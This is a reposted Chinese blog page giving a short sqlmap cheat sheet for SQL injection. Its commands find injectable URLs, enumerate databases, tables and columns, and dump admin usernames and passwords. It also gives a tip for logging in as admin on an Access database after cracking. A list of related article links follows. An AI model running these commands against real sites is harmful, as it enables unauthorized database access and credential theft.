SQLmap数据库注入攻击
来源:互联网 发布:网店转让 知乎 编辑:程序博客网 时间:2024/05/23 02:04
指令:
- sqlmap -u url 扫描注入点扫描目标主机。(url前提是存在漏洞)
- sqlmap -u url --users 获取到用户名
- sqlmap -u url --dbs 爆出该sqlserver中所有数据库名称
- sqlmap -u url --current -db 爆出当前web使用的数据库
- sqlmap -u url --current -user web数据库使用的账户
- sqlmap -u url -D (指定数据库名称) --tables 列出数据库中的表
- sqlmap -u url -D 数据库名称 -T(指定要列出字段的表) --columns (指定列出字段)
- sqlmap -u url -D** -T** -C“指定要爆的字段” --dump(导出)
- <--start 1 --stop 10 --dump 第1到第10行>
- sqlmap -u url --dump -tables 探测数据库和表的信息
- sqlmap -u url --dump -T admin -C admin,password 进行暴库,获得用户名和密码
- sqlmap:盲推理SQL注入,UNION查询SQL注入,堆查询,基于时间的SQL盲注。
- ***acess中 爆破后,admin加密为bfpms 将bfpms填到password字段中,就可以使用admin
- http://blog.csdn.net/zgyulongfei/article/details/41017493/(sqlmap简单使用说明)
阅读全文
0 0
- SQLmap数据库注入攻击
- 使用SQLMAP对网站和数据库进行SQL注入攻击
- SQL注入攻击之SQLMap渗透测试
- 数据库注入攻击和防止注入攻击
- 数据库注入攻击
- 【数据库】SQL注入攻击
- 数据库防注入攻击
- 使用免费sqlmap工具抵御SQL注入攻击
- SQLMAP渗透笔记之MSSQL数据库注入
- SQLMAP渗透笔记之MySQL数据库注入
- 简单数据库注入式攻击
- Burpsuite+SQLMAP双璧合一绕过Token保护的应用进行注入攻击
- PreparedStatement 防数据库注入漏洞攻击
- 各种数据库介绍及SQL注入攻击
- sqlmap注入语句整理
- sqlmap注入语句整理
- sqlmap注入Access实例
- Sqlmap的POST注入
- HDU 1875 畅通工程再续 克鲁斯卡尔
- 字符串的组合
- Android百度地图(五):百度地图鹰眼sdk监控进出地理围栏(区域)
- 卡尔曼滤波
- PAT,IT届的托福,高分者直通名企面试
- SQLmap数据库注入攻击
- php 数组函数操作方法
- 模拟aloha协议
- 51单片机的中断系统(一)
- Toolbar设置详解----掉坑总结
- 删除和计算总数
- MySQL 基本操作--DML:数据操作语句(insert、delete、update)
- PAT 1105. Spiral Matrix (25) 螺旋矩阵,二维数组的一维应用及边界模拟
- 指针数组与数组指针